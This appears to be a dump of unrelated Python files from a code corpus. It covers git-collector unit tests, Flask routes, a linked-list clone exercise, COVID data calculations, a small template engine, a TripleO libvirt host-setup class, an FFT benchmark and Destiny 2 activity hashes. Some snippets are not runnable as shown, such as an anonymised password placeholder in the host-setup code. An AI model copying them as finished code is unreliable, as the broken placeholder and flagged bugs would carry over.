        with self.assertRaises(ValueError, msg="Have to have at least 2 expressions"):
            DisjointUnion(SCT['12345'], SCT['303394007']).to_functional(self.sw)
    def test_haskey(self):
        self.assertEqual('''HasKey( :12345 (
    :23456
    :23457
    ) (
    :23458
    :23459
    ) )''', str(HasKey(SCT['12345'], ObjectPropertyExpression(SCT['23456']), ObjectPropertyExpression(SCT['23457']),
                       DataPropertyExpression(SCT['23458']), DataPropertyExpression(SCT['23459'])).to_functional(self.sw.reset())))
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
4804858 | from redis_ratelimit.decorators import ratelimit
| StarcoderdataPython |
3201418 | import json
import subprocess
from . import collectors
class CompletedProcessMock:
    """Minimal stand-in for subprocess.CompletedProcess, exposing only stdout/stderr."""
    def __init__(self, stdout='', stderr=''):
        self.stdout, self.stderr = stdout, stderr
blame_text = """\
aacd7f517fb0312ec73f882a345d50c6e8512405 1 1 1
author <NAME>
...
filename file.txt
line one
4cbb5a68de251bf42ecfc2b127fd2596c0d17d3f 1 2 1
author <NAME>
...
filename file.txt
line two
""" # flake8: noqa
shortlog_text = """\
1528753992 dcc3c393 M Nasimul Haque
1 file changed, 1 insertion(+), 1 deletion(-)
1528753813 a36e16b3 M Nasimul Haque
1 file changed, 3 insertions(+)
"""
def assert_subprocess_run(cmd):
    """Assert that the (mocked) subprocess.run was called exactly once with *cmd*.

    The command is expected to be wrapped in `nice -n 20`, run from /tmp via
    a shell, with captured text output.  Only meaningful when subprocess.run
    has been patched by the calling test (call_count/assert_any_call are
    mock attributes).
    """
    assert subprocess.run.call_count == 1
    subprocess.run.assert_any_call(
        f'nice -n 20 {cmd}', cwd='/tmp', check=True, shell=True,
        stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True
    )
def test_clone(mocker):
    # clone() shells out to `git clone <url> <name>` in the work dir
    mocker.patch('subprocess.run')
    collectors.clone('/tmp', 'foo', 'bar')
    assert_subprocess_run('git clone bar foo')
def test_clone_on_exception(mocker):
    # a failing clone is swallowed: the command is still issued, nothing raises
    run = mocker.patch('subprocess.run')
    run.side_effect = Exception('failed')
    collectors.clone('/tmp', 'foo', 'bar')
    assert_subprocess_run('git clone bar foo')
def test_get_timestamp(mocker):
    # get_timestamp() parses the epoch seconds printed by `git log`
    run = mocker.patch('subprocess.run')
    run.return_value = CompletedProcessMock('123456')
    result = {'timestamp': 123456, 'revision': 'bar'}
    assert collectors.get_timestamp('/', 'tmp', 'bar') == result
    assert_subprocess_run('git log --pretty=format:"%at" -n 1 bar')
def test_get_blame(mocker):
    # blame porcelain output is aggregated into per-author line counts
    run = mocker.patch('subprocess.run')
    run.return_value = CompletedProcessMock(blame_text)
    result = {'authors': {'<NAME>': 2}, 'file': 'file.txt'}
    assert collectors.get_blame('/', 'tmp', False, 'file.txt') == result
    assert_subprocess_run('git blame --line-porcelain -w file.txt')
def test_get_blame_detect_move(mocker):
    # detect_move=True adds the -C -C -C -M copy/move detection flags
    run = mocker.patch('subprocess.run')
    run.return_value = CompletedProcessMock(blame_text)
    result = {'authors': {'<NAME>': 2}, 'file': 'file.txt'}
    assert collectors.get_blame('/', 'tmp', True, 'file.txt') == result
    assert_subprocess_run('git blame --line-porcelain -C -C -C -M -w file.txt')
def test_get_blame_on_exception(mocker):
    # a failing blame yields an empty author map rather than raising
    run = mocker.patch('subprocess.run')
    run.side_effect = Exception('failed')
    result = {'authors': {}, 'file': 'file.txt'}
    assert collectors.get_blame('/', 'tmp', False, 'file.txt') == result
    assert_subprocess_run('git blame --line-porcelain -w file.txt')
def test_get_branches(mocker):
    # remote branches are listed; the symbolic "... HEAD" entry is excluded
    run = mocker.patch('subprocess.run')
    run.return_value = CompletedProcessMock('b1\nb2\nb3 HEAD')
    result = {'branches': ['b1', 'b2'], 'repo': 'tmp'}
    assert collectors.get_branches('/', 'tmp') == result
    assert_subprocess_run('git branch -r')
def test_get_tags(mocker):
    # show-ref lines ("<sha> <tag>") are split into revision/tag dicts
    run = mocker.patch('subprocess.run')
    run.return_value = CompletedProcessMock('123 b1\n456 b2')
    result = {
        'tags': [
            {'revision': '123', 'tag': 'b1'},
            {'revision': '456', 'tag': 'b2'},
        ],
        'repo': 'tmp',
    }
    assert collectors.get_tags('/', 'tmp') == result
    assert_subprocess_run('git show-ref --tags')
def test_get_tags_on_exception(mocker):
    # when show-ref fails (e.g. no tags), an empty tag list is returned
    run = mocker.patch('subprocess.run')
    run.side_effect = Exception('failed')
    result = {'repo': 'tmp', 'tags': []}
    assert collectors.get_tags('/', 'tmp') == result
    assert_subprocess_run('git show-ref --tags')
def test_num_files(mocker):
    """num_files counts the paths listed by `git ls-tree` for one revision."""
    run = mocker.patch('subprocess.run')
    run.return_value = CompletedProcessMock('f1\nf2')
    revision = {'revision': '12345', 'timestamp': 12345}
    expected = {'12345': {'files': 2, 'timestamp': 12345}}
    assert collectors.num_files('/', 'tmp', revision) == expected
    assert_subprocess_run('git ls-tree -r --name-only 12345')


def test_count_lines(mocker):
    """count_lines wraps cloc's JSON output under the 'lines' key."""
    run = mocker.patch('subprocess.run')
    run.return_value = CompletedProcessMock('{"lines": "data from cloc"}')
    expected = {'data': {'lines': {'lines': 'data from cloc'}}, 'repo': 'tmp'}
    assert collectors.count_lines('/', 'tmp') == expected
    assert_subprocess_run('cloc --vcs git --json')


def test_count_lines_on_exception(mocker):
    """A failing cloc call yields an empty 'lines' payload instead of raising."""
    run = mocker.patch('subprocess.run')
    run.side_effect = Exception('failed')
    assert collectors.count_lines('/', 'tmp') == {'data': {'lines': []}, 'repo': 'tmp'}
    assert_subprocess_run('cloc --vcs git --json')
def test_activity(mocker):
    """activity aggregates shortlog output per author and per time bucket.

    The per-period stats (commits/deletions/insertions) are identical for
    'by_authors' and 'by_time' in this fixture, so they are built once.
    """
    run = mocker.patch('subprocess.run')
    run.return_value = CompletedProcessMock(shortlog_text)

    def period_stats(bucket):
        # 2 commits, 1 deletion, 4 insertions all fall into a single bucket.
        return {'commits': {bucket: 2}, 'deletions': {bucket: 1}, 'insertions': {bucket: 4}}

    stats = {
        'at_hour': period_stats('22'),
        'daily': period_stats('2018-06-11'),
        'monthly': period_stats('2018-06'),
        'weekly': period_stats('2018-24'),
        'yearly': period_stats('2018'),
    }
    expected = {
        'data': {
            'authors_age': {
                '<NAME>': {
                    'days': 1,
                    'first_commit': 1528753813,
                    'last_commit': 1528753992,
                },
            },
            'by_authors': {'<NAME>': stats},
            'by_time': dict(stats),
            'hour_of_week': {'0': {'22': 2}},
        },
        'repo': 'tmp',
        'revisions': [
            {'revision': 'dcc3c393', 'timestamp': 1528753992},
            {'revision': 'a36e16b3', 'timestamp': 1528753813},
        ],
    }
    assert json.loads(json.dumps(collectors.activity('/', 'tmp'))) == expected
    assert_subprocess_run('git log --shortstat --pretty=format:"%at %T %aN" HEAD')
def _summary_run_outputs(shortlog, tags):
    """subprocess.run outputs for collectors.summary, in call order.

    Only the shortlog and show-ref results differ between the two tests.
    """
    return [
        CompletedProcessMock('1234'),                                    # empty sha generator
        CompletedProcessMock(' 98 files changed, 10564 insertions(+)'),  # diff --shortstat
        shortlog,                                                        # shortlog -s
        CompletedProcessMock('93'),                                      # rev-list --count HEAD
        CompletedProcessMock('origin/master'),                           # branch -r
        CompletedProcessMock('1527621944\n1527761990\n1527763244'),      # log --reverse %at
        CompletedProcessMock('1528755935'),                              # log %at -n1
        tags,                                                            # show-ref --tags
    ]


def _expected_summary(tags_count):
    """Expected summary payload; only the tag count varies between tests."""
    return {
        'data': [
            {'key': 'files', 'value': '98'},
            {'key': 'lines', 'notes': 'includes empty lines', 'value': '10564'},
            {'key': 'authors', 'value': 1},
            {'key': 'commits', 'notes': 'master only', 'value': '93'},
            {'key': 'branches', 'value': 1},
            {'key': 'tags', 'value': tags_count},
            {'key': 'age', 'notes': 'active days since creation', 'value': 14}],
        'repo': 'tmp',
    }


def test_summary(mocker):
    """summary folds the outputs of several git calls into key/value rows."""
    run = mocker.patch('subprocess.run')
    run.side_effect = _summary_run_outputs(
        CompletedProcessMock(' 93 M <NAME>'),
        CompletedProcessMock('refs/tags/v1'))
    assert collectors.summary('/', 'tmp') == _expected_summary(1)


def test_summary_on_exception(mocker):
    """A failing show-ref call produces a tag count of 0 instead of raising."""
    run = mocker.patch('subprocess.run')
    run.side_effect = _summary_run_outputs(
        CompletedProcessMock(' 93 <NAME>'),
        Exception('refs/tags/v1'))
    assert collectors.summary('/', 'tmp') == _expected_summary(0)
def test_update_repo(mocker):
    """update_repo clones/pulls and reports HEAD plus the first-commit date."""
    run = mocker.patch('subprocess.run')
    # Outputs in call order: clone, pull --tags, HEAD log, first-timestamp log.
    run.side_effect = [
        CompletedProcessMock(''),
        CompletedProcessMock(''),
        CompletedProcessMock('head 23456 author'),
        CompletedProcessMock('12345'),
    ]
    expected = {
        'HEAD': 'head',
        'author': 'author',
        'date': 23456,
        'name': 'tmp',
        'start_date': 12345,
    }
    assert collectors.update_repo('/', ['tmp', 'https://example.com']) == expected


def test_update_repo_on_exception(mocker):
    """Any git failure makes update_repo return an empty dict."""
    failing_run = mocker.patch('subprocess.run')
    failing_run.side_effect = Exception('')
    assert collectors.update_repo('/', ['tmp', 'https://example.com']) == {}
| StarcoderdataPython |
1728791 | from flask import abort, jsonify, session
from app.util import request_helper
from app.services import reddit_service
from app.db.models.raffle import Raffle
from app.db.models.user import User
@request_helper.require_login
def get_user_submissions():
    """Return the logged-in user's Reddit submissions not yet made into raffles.

    Responds 401 when the session JWT does not resolve to a known user;
    otherwise returns a JSON list of submission payloads.
    """
    user = User.find_by_jwt(session["jwt"])
    if not user:
        abort(401)
    submissions = reddit_service.get_submissions_for_user(user.get_refresh_token())
    if not submissions:
        return jsonify([])
    # Remove submissions that already back a verified raffle.
    # (set comprehension instead of set([listcomp]) — avoids the throwaway list)
    existing_verified_raffle_ids = {
        raffle.submission_id for raffle in Raffle.get_verified_raffles()
    }
    filtered_submissions = [
        submission
        for submission in submissions
        if submission["id"] not in existing_verified_raffle_ids
    ]
    return jsonify(filtered_submissions)
def get_user_raffles(username):
    """Return every raffle created by *username*, or a 404 payload if unknown."""
    user = User.query.filter_by(username=username).first()
    if not user:
        return jsonify({"message": "User not found."}), 404
    raffles = [raffle.as_dict() for raffle in user.raffles]
    return jsonify(raffles)
# Route table consumed elsewhere to register these view functions on the app.
RouteConfigs = [
    {"rule": "/submissions", "view_func": get_user_submissions},
    {"rule": "/users/<username>/raffles", "view_func": get_user_raffles},
]
| StarcoderdataPython |
188691 | <gh_stars>1-10
class Node:
    """A linked-list node carrying an extra arbitrary (``arb``) pointer."""

    def __init__(self, data):
        self.data = data
        # Both outgoing links start unset; `arb` may later point to any node.
        self.next = self.arb = None
class Solution:
    """Deep-copies a linked list whose nodes carry an extra ``arb`` pointer.

    Strategy: clone the ``next`` chain, then point every original node's
    ``next`` at its own clone (interleaving), so each clone's ``arb`` can be
    resolved through the originals.

    NOTE: this approach overwrites the original nodes' ``next`` pointers and
    does not restore them — the source list is consumed by the copy.
    """

    def cloneList(self, head):
        """Return a copy of the ``next`` chain only; ``arb`` is left unset."""
        clone_head = clone_last = None
        current_node = head
        while current_node:
            if clone_head is None:  # `is None`, not `== None` (E711)
                clone_head = clone_last = Node(current_node.data)
            else:
                clone_last.next = Node(current_node.data)
                clone_last = clone_last.next
            current_node = current_node.next
        return clone_head

    def copyPointers(self, original, clone):
        """Interleave the lists: original[i].next -> clone[i], and stash
        original[i].arb (an *original* node) on clone[i].arb for later."""
        ptr0 = ptr1 = original
        ptr2 = clone
        while ptr1 and ptr2:
            ptr0 = ptr1
            ptr1 = ptr1.next
            ptr0.next = ptr2
            ptr2.arb = ptr0.arb
            ptr2 = ptr2.next
        return original, clone

    def makePointers(self, original, clone):
        """Resolve every clone's ``arb`` to the *clone* of its target.

        After copyPointers, each original node's ``next`` is its clone, so
        the clone of clone.arb (an original node) is ``clone.arb.next``.
        BUG FIX: the original code used ``ptr1.arb.arb.next``, which resolves
        to the clone of the arb target's *own* arb target — one hop too far —
        and crashed when ``arb`` was None.
        """
        ptr1 = clone
        while ptr1:
            ptr1.arb = ptr1.arb.next if ptr1.arb else None
            ptr1 = ptr1.next
        return clone

    def copyList(self, head):
        """Return a deep copy of the list starting at *head*.

        BUG FIX: the original guard ``not head and not head.next`` raised
        AttributeError for head=None because it dereferenced head.next.
        """
        if head is None:
            return head
        clone_head = self.cloneList(head)
        head, clone_head = self.copyPointers(head, clone_head)
        return self.makePointers(head, clone_head)
# Ad-hoc smoke test: a 3-node list (1 -> 2 -> 3) whose arb pointers form a
# cycle (1 -> 3, 3 -> 2, 2 -> 1), cloned with the Solution defined above.
h1 = Node(1)
h2 = Node(2)
h3 = Node(3)
h1.next = h2
h2.next = h3
h1.arb = h3
h3.arb = h2
h2.arb = h1
s = Solution()
x = s.copyList(h1)
class MyDictionary(dict):
    """A dict subclass exposing an explicit ``add(key, value)`` method."""

    def __init__(self):
        # The original also rebound the *local* name `self` to a fresh
        # dict(), which had no effect whatsoever; dict's __init__ suffices.
        super().__init__()

    def add(self, key, value):
        """Store *value* under *key* (equivalent to ``self[key] = value``)."""
        self[key] = value
class Solution:
    """Deep-copies an ``arb``-pointer linked list using an original->clone map.

    Unlike the interleaving variant above, this version leaves the original
    list untouched.
    """

    def copyList(self, head):
        """Return a deep copy of the list starting at *head*.

        BUG FIX: the original guard ``not head and not head.next`` raised
        AttributeError for head=None because it dereferenced head.next.
        """
        if head is None:
            return head
        self.head = head
        return self.clone()

    def clone(self):
        """Clone self.head's list and return the head of the *clone*."""
        # Pass 1: create a clone for every original node.
        original = self.head
        mp = MyDictionary()
        while original is not None:
            mp.add(original, Node(original.data))
            original = original.next
        # Pass 2: wire each clone's next/arb through the map. A None
        # endpoint is simply absent from the map, so dict.get() yields None.
        original = self.head
        while original is not None:
            clone = mp.get(original)
            clone.next = mp.get(original.next)
            clone.arb = mp.get(original.arb)
            original = original.next
        # BUG FIX: return the cloned head; the original returned self.head,
        # i.e. the *source* list, making the whole copy unreachable.
        return mp.get(self.head)
8199977 | <reponame>magostin/coronavirus
import pandas as pd
def add_calc(x):
    """Derive daily deltas and percentage indicators from a cumulative frame.

    Expects the cumulative columns ``deceduti``, ``tamponi``, ``casi_testati``,
    ``nuovi_positivi``, ``totale_positivi`` and ``totale_casi``; returns a new
    DataFrame of derived series.
    """
    nuovi_tamponi = x.tamponi.diff()
    pct_nuovi_positivi = 100.0 * x['nuovi_positivi'] / nuovi_tamponi
    # Implausible daily positivity rates (outside 0-50%) are blanked to NaN.
    pct_nuovi_positivi = pct_nuovi_positivi.mask(pct_nuovi_positivi > 50).mask(pct_nuovi_positivi < 0)
    return pd.DataFrame({
        'nuovi_deceduti': x.deceduti.diff(),
        'nuovi_tamponi': nuovi_tamponi,
        'nuovi_casi_testati': x.casi_testati.diff(),
        'incremento': 100.0 * x['nuovi_positivi'] / x['totale_positivi'],
        'percentuale_positivi': 100.0 * x['totale_casi'] / x['casi_testati'],
        'percentuale_nuovi_positivi': pct_nuovi_positivi,
        'letalita': 100.0 * x.deceduti / x.totale_casi,
    })
def calculate_per_1M_pop(df):
    """Add per-million-inhabitants versions of the case/death columns.

    Mutates *df* in place and returns it. Negative daily death deltas
    (reporting corrections) are blanked to NaN.
    """
    def per_million(series):
        return 1e6 * series / df.popolazione

    df['totale_casi_per_1M_pop'] = per_million(df.totale_casi)
    df['deceduti_per_1M_pop'] = per_million(df.deceduti)
    df['nuovi_deceduti_per_1M_pop'] = per_million(df.nuovi_deceduti)
    df['nuovi_deceduti_per_1M_pop'] = df['nuovi_deceduti_per_1M_pop'].mask(
        df['nuovi_deceduti_per_1M_pop'] < 0)
    df['nuovi_positivi_per_1M_pop'] = per_million(df.nuovi_positivi)
    return df
def prov_per_1M_pop(df):
    """Add per-province daily deltas and per-million columns; returns *df*.

    The first row of each province has no previous total, so its delta
    (and hence the increment) is NaN.
    """
    daily_new = df.groupby('provincia').totale_casi.diff()
    df['nuovi_positivi'] = daily_new
    df['incremento'] = 100.0 * daily_new / df['totale_casi']
    df['totale_casi_per_1M_pop'] = 1e6 * df.totale_casi / df.popolazione
    df['nuovi_positivi_per_1M_pop'] = 1e6 * df.nuovi_positivi / df.popolazione
    return df
| StarcoderdataPython |
248290 | <gh_stars>1-10
# -*- coding: utf-8 -*-
#
# Copyright (C) 2016 Red Hat, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from rdomhelper.server import Server
from rdomhelper.undercloud import Undercloud
from jinja2 import Environment
from jinja2 import FileSystemLoader
class Host0(Server):
    """The bare-metal host that will run the virtualized TripleO undercloud."""

    def __init__(self, **kwargs):
        Server.__init__(self, **kwargs)

    def deploy_hypervisor(self):
        """Install and start libvirt plus the TripleO/instack tooling."""
        self.run('yum install -y libvirt-daemon-driver-nwfilter libvirt-client libvirt-daemon-config-network libvirt-daemon-driver-nodedev libvirt-daemon-kvm libvirt-python libvirt-daemon-config-nwfilter libvirt-glib libvirt-daemon libvirt-daemon-driver-storage libvirt libvirt-daemon-driver-network libvirt-devel libvirt-gobject libvirt-daemon-driver-secret libvirt-daemon-driver-qemu libvirt-daemon-driver-interface libguestfs-tools.noarch virt-install genisoimage openstack-tripleo libguestfs-tools instack-undercloud')
        # Allow unauthenticated read-write access on the libvirt UNIX socket.
        self.run('sed -i "s,#auth_unix_rw,auth_unix_rw," /etc/libvirt/libvirtd.conf')
        self.run('systemctl start libvirtd')
        self.run('systemctl status libvirtd')
        # Copy the host's yum repo files where disk-image-builder can use them.
        self.run('mkdir -p /home/stack/DIB')
        self.run('find /etc/yum.repos.d/ -type f -exec cp -v {} /home/stack/DIB \;')
        self.install_base_packages()
        self.clean_system()
        self.update_packages()

    def instack_virt_setup(self, guest_image_path, guest_image_checksum,
                           rhsm_login=None, rhsm_password=None):
        """Run instack-virt-setup and return a handle on the new undercloud VM.

        Downloads the guest image, renders the virt-setup-env jinja2 template,
        drives `instack-virt-setup`, then resolves the undercloud VM's IP from
        the host's neighbor table.
        """
        self.run('sysctl net.ipv4.ip_forward=1')
        self.fetch_image(path=guest_image_path, checksum=guest_image_checksum, dest='/home/stack/guest_image.qcow2',
                         user='stack')
        # NOTE(Gonéri): this is a hack for our OpenStack, the MTU of its outgoing route
        # is 1400 and libvirt do not provide a mechanism to adjust the guests MTU.
        self.run("LIBGUESTFS_BACKEND=direct virt-customize -a /home/stack/guest_image.qcow2 --run-command 'echo MTU=\"1400\" >> /etc/sysconfig/network-scripts/ifcfg-eth0'")
        env = Environment()
        env.loader = FileSystemLoader('templates')
        template = env.get_template('virt-setup-env.j2')
        virt_setup_env = template.render(
            {
                'dib_dir': '/home/stack/DIB',
                'node': {
                    'count': 3,
                    'mem': 4096,
                    'cpu': 2
                },
                'undercloud_node_mem': 4096,
                'guest_image_name': '/home/stack/guest_image.qcow2',
                'rhsm': {
                    'user': rhsm_login,
                    # NOTE(review): "<PASSWORD>" is an anonymization placeholder
                    # (not valid Python) — presumably rhsm_password; restore it.
                    'password': <PASSWORD>
                }})
        self.create_file('virt-setup-env', virt_setup_env, user='stack')
        self.run('source virt-setup-env; instack-virt-setup', user='stack')
        # Map the instack VM's MAC to its IP via the host's neighbor cache.
        undercloud_ip = self.run(
            '/sbin/ip n | grep $(tripleo get-vm-mac instack) | awk \'{print $1;}\'',
            user='stack')[0]
        undercloud = Undercloud(undercloud_ip,
                                via_ip=self._hostname,
                                user='root',
                                key_filename=self._key_filename)
        return undercloud
| StarcoderdataPython |
3422121 | from __future__ import absolute_import, unicode_literals
import re
import asteval
import yaml
# Regular-expression building blocks for the template grammar below.
VAR_RE = r"[_a-zA-Z][a-zA-Z0-9_]*"           # a Python-style identifier
EXPRESSION_RE = r"[\[\]():.a-zA-Z0-9_]*"     # a restricted, space-free expression
PRINT_RE = r"{{ *(.+?) *}}"                  # {{ expression }} interpolation
START_BLOCK_RE = r"{% *(if|for) +(.+?) *%}"  # opening tag of an if/for block
END_BLOCK_RE = r"{% *end(for|if) *%}"        # matching closing tag
# NOTE(review): the `expression` format argument is passed but never used in
# the pattern — confirm whether the iterable was meant to be constrained.
FOR_RE = r"{{% *for +({varname}) +in +([^%]+) *%}}".format(varname=VAR_RE, expression=EXPRESSION_RE)
IF_RE = r"{% *if +(.+?) *%}"
BLOCK_RE = r"{% *block +(.+?) *%}((?:.|\n)+?){% *endblock *%}"
INCLUDE_RE = r"{% *include +(.+?) *%}"
class Template(object):
    """Tiny regex-driven template engine.

    Supports ``{{ expression }}`` interpolation (evaluated in an asteval
    sandbox), nested ``{% if %}``/``{% for %}`` blocks, named
    ``{% block name %}...{% endblock %}`` definitions and ``{% include name %}``
    expansion of those named blocks.
    """

    def __init__(self, template):
        self.template = template    # raw template text
        self.clean_template = None  # template minus {% block %} sections (built lazily)
        self.blocks = {}            # block name -> block body

    @classmethod
    def from_file(cls, filename):
        """Build a Template from a file with ``---``-delimited YAML front matter.

        Every front-matter key is copied onto the instance as an attribute.
        NOTE(review): split("---", 2) yields three parts if the body itself
        contains "---", which would make this 2-name unpacking raise.
        """
        with open(filename) as f:
            front_matter, body = f.read().strip("-\n").split("---", 2)
        front_matter = yaml.load(front_matter)
        template = cls(body)
        template.__dict__.update(front_matter)
        return template

    def render(self, **vars):
        """Render the whole template using *vars* as the variable scope."""
        if self.clean_template is None:
            self._get_blocks()
        return self._expand(self.clean_template, **vars)

    def render_block(self, block, **vars):
        """Render only the named ``{% block %}`` using *vars*."""
        if self.clean_template is None:
            self._get_blocks()
        return self._expand(self.blocks[block], **vars)

    def _eval_context(self, vars):
        # Sandboxed evaluator whose symbol table is the caller's vars;
        # __last_iteration is always defined so loop bodies can test it.
        e = asteval.Interpreter(symtable=vars, use_numpy=False, writer=None)
        e.symtable['__last_iteration'] = vars.get("__last_iteration", False)
        return e

    def _get_blocks(self):
        # Extract every {% block name %}...{% endblock %} into self.blocks,
        # leaving the remainder of the template in self.clean_template.
        def s(match):
            name, contents = match.groups()
            self.blocks[name] = self._strip_single_nl(contents)
            return ""
        self.clean_template = re.sub(BLOCK_RE, s, self.template, flags=re.MULTILINE)

    def _expand(self, template, **vars):
        """Expand *template*: text between top-level blocks is interpolated,
        each top-level if/for block is delegated to its dedicated expander."""
        # Every block open (+1) / close (-1) marker with its position, sorted
        # into document order so nesting can be tracked with a counter.
        stack = sorted(
            [(m.start(), 1, m.groups()[0]) for m in re.finditer(START_BLOCK_RE, template)] +
            [(m.end(), -1, m.groups()[0]) for m in re.finditer(END_BLOCK_RE, template)]
        )
        last_nesting, nesting = 0, 0
        start = 0
        result = ""
        block_type = None
        if not stack:
            return self._expand_vars(template, **vars)
        for pos, indent, typ in stack:
            nesting += indent
            if nesting == 1 and last_nesting == 0:
                # Entering a top-level block: flush the plain text before it.
                block_type = typ
                result += self._expand_vars(template[start:pos], **vars)
                start = pos
            elif nesting == 0 and last_nesting == 1:
                # Leaving a top-level block: expand it as a whole.
                if block_type == "if":
                    result += self._expand_cond(template[start:pos], **vars)
                elif block_type == "for":
                    result += self._expand_loops(template[start:pos], **vars)
                elif block_type == "block":
                    # NOTE(review): START_BLOCK_RE only matches "if"/"for", so
                    # this branch looks unreachable, and _save_block is not
                    # defined on this class — confirm before relying on it.
                    result += self._save_block(template[start:pos], **vars)
                start = pos
            last_nesting = nesting
        # Tail text after the last block marker.
        result += self._expand_vars(template[stack[-1][0]:], **vars)
        return result

    def _expand_vars(self, template, **vars):
        # Expand {% include name %} first, then {{ expression }} prints.
        safe_eval = self._eval_context(vars)
        expanded = re.sub(INCLUDE_RE, lambda m: self.render_block(m.groups()[0], **vars), template)
        return re.sub(PRINT_RE, lambda m: str(safe_eval(m.groups()[0])), expanded)

    def _expand_cond(self, template, **vars):
        # *template* is a full "{% if expr %}...{% endif %}" span.
        start_block = re.search(IF_RE, template, re.M)
        end_block = list(re.finditer(END_BLOCK_RE, template, re.M))[-1]
        expression = start_block.groups()[0]
        sub_template = self._strip_single_nl(template[start_block.end():end_block.start()])
        safe_eval = self._eval_context(vars)
        if safe_eval(expression):
            # NOTE(review): vars are not forwarded here (unlike _expand_loops),
            # so variables inside an if-body expand against an empty scope —
            # confirm whether that is intentional.
            return self._expand(sub_template)
        return ""

    def _strip_single_nl(self, template, strip_r=True):
        # Drop at most one leading (and optionally trailing) newline so block
        # markers on their own lines do not inject blank lines into output.
        # NOTE(review): raises IndexError for an empty string — confirm callers
        # never pass one.
        if template[0] == "\n":
            template = template[1:]
        if strip_r and template[-1] == "\n":
            template = template[:-1]
        return template

    def _expand_loops(self, template, **vars):
        # *template* is a full "{% for var in iterable %}...{% endfor %}" span.
        start_block = re.search(FOR_RE, template, re.M)
        end_block = list(re.finditer(END_BLOCK_RE, template, re.M))[-1]
        var_name, iterator = start_block.groups()
        sub_template = self._strip_single_nl(template[start_block.end():end_block.start()], strip_r=False)
        safe_eval = self._eval_context(vars)
        result = ''
        items = safe_eval(iterator)
        for idx, var in enumerate(items):
            # The loop variable and the last-iteration flag are visible to
            # the body through the shared vars mapping.
            vars[var_name] = var
            vars['__last_iteration'] = idx == len(items) - 1
            result += self._expand(sub_template, **vars)
        del vars[var_name]
        return self._strip_single_nl(result)
| StarcoderdataPython |
4887397 | """
Execution of fft.py
"""
import math
import gc
from pyske.core import PList, par
from pyske.core import Timing
from pyske.examples.list import util
from pyske.examples.list.fft import fft
# -------------- Execution --------------
def _is_power_of_2(num: int) -> bool:
return num == round(2 ** (math.log2(num)))
def _main():
    """Parse the command line, run the FFT num_iter times and report timings."""
    size, num_iter, _ = util.standard_parse_command_line(data_arg=False)
    assert _is_power_of_2(size), "The size should be a power of 2."
    assert _is_power_of_2(len(par.procs())), "The number of processors should be a power of 2."
    # A constant parallel list of 1.0s of the requested size.
    input_list = PList.init(lambda _: 1.0, size)
    timing = Timing()
    # GC is disabled so collection pauses do not pollute the measurements;
    # a collection is triggered explicitly after each timed run instead.
    gc.disable()
    for iteration in range(1, 1 + num_iter):
        timing.start()
        result = fft(input_list)
        timing.stop()
        gc.collect()
        result = result.to_seq()[0]
        util.print_experiment(result, timing.get(), par.at_root, iteration)


if __name__ == '__main__':
    _main()
| StarcoderdataPython |
251844 | from ElevatorBot.database.database import getGrandmasterHashes
# from https://data.destinysets.com/
# raids
from ElevatorBot.backendNetworking.event_loop import get_asyncio_loop
# Destiny 2 activity hashes, one list per activity because Bungie uses a
# distinct hash per difficulty/rotation (source: https://data.destinysets.com/).
spirePHashes = [3213556450]
spireHashes = [119944200]
eaterPHashes = [809170886]
eaterHashes = [3089205900]
# there is a hash for each levi-rotation and one for each possible prestige modifier
leviHashes = [2693136600, 2693136601, 2693136602, 2693136603, 2693136604, 2693136605]
leviPHashes = [
    417231112,
    508802457,
    757116822,
    771164842,
    1685065161,
    1800508819,
    2449714930,
    3446541099,
    3857338478,
    3879860661,
    3912437239,
    4206123728,
]
scourgeHashes = [548750096]
lwHashes = [2122313384]
cosHashes = [3333172150, 960175301]
gosHashes = [2659723068, 2497200493, 3458480158, 3845997235]
dscHashes = [910380154, 3976949817]
vogHashes = [1485585878, 3711931140, 3881495763]
vogMasterHashes = [1681562271]
# dungeons
throneHashes = [1893059148, 2032534090]
pitHashes = [1375089621, 2559374368, 2559374374, 2559374375]
prophHashes = [1077850348, 4148187374]
harbHashes = [
    1738383283,
]
presageHashes = [
    2124066889,
]
presageMasterHashes = [
    4212753278,
]
# menagerie
premenHashes = [2509539864, 2509539865, 2509539867, 1831470693, 3107795800, 3115455134]
# secret missions
whisperHashes = [74501540]
herwhisperHashes = [1099555105]
zeroHashes = [3232506937]
herzeroHashes = [2731208666]
# nightfalls
# NOTE(review): this blocks at import time — the grandmaster nightfall hashes
# are fetched synchronously from the database while the module is loaded.
loop = get_asyncio_loop()
gmHashes = loop.run_until_complete(getGrandmasterHashes())
# activityTypeHashes (the *mode* of an activity, not a specific activity)
activityStoryHash = [147238405, 1686739444, 1299744814, 2201105581, 2911768360]
activityRaidHash = [2043403989]
activityDungeonHash = [608898761]
activityGambitHash = [636666746, 1418469392, 2490937569]  # will probly change with BL
activityNFHash = [575572995]
# NOTE(review): this list contains duplicated entries (2884569138, 4110605575
# each appear twice) — confirm whether that is intentional.
activityStrikeHash = [2884569138, 2884569138, 4110605575, 4110605575, 4164571395]
activityPrivateMatchHash = [4260058063]
activityPVPHash = [
    96396597,
    158362448,
    517828061,
    964120289,
    1434366740,
    1472571612,
    1522227381,
    2112637710,
    2175955486,
    2278747016,
    2371050408,
    2394267841,
    2410913661,
    2505748283,
    3252144427,
    3268478079,
    3517186939,
    3610972626,
    3954711135,
    3956087078,
    3956381302,
    3990775146,
    4141415314,
    4288302346,
]
activityLighthouseHash = [4276116472]
# Metric hashes (profile metrics tracking completion counts / win streaks)
metricLeviCompletions = [2486745106]
metricEoWCompletions = [2659534585]
metricSosCompletions = [700051716]
metricLWCompletions = [905240985]
metricScourgeCompletions = [1201631538]
metricCoSCompletions = [1815425870]
metricGoSCompletions = [1168279855]
# Maps a raid's activity hashes (as a hashable tuple key) to its metric.
metricRaidAllocation = {
    tuple(eaterHashes): metricEoWCompletions,
    tuple(spireHashes): metricSosCompletions,
    tuple(scourgeHashes): metricScourgeCompletions,
    tuple(cosHashes): metricCoSCompletions,
    tuple(lwHashes): metricLWCompletions,
    tuple(gosHashes): metricGoSCompletions,
}
metricWinStreakGambitWeekly = [1053579811]
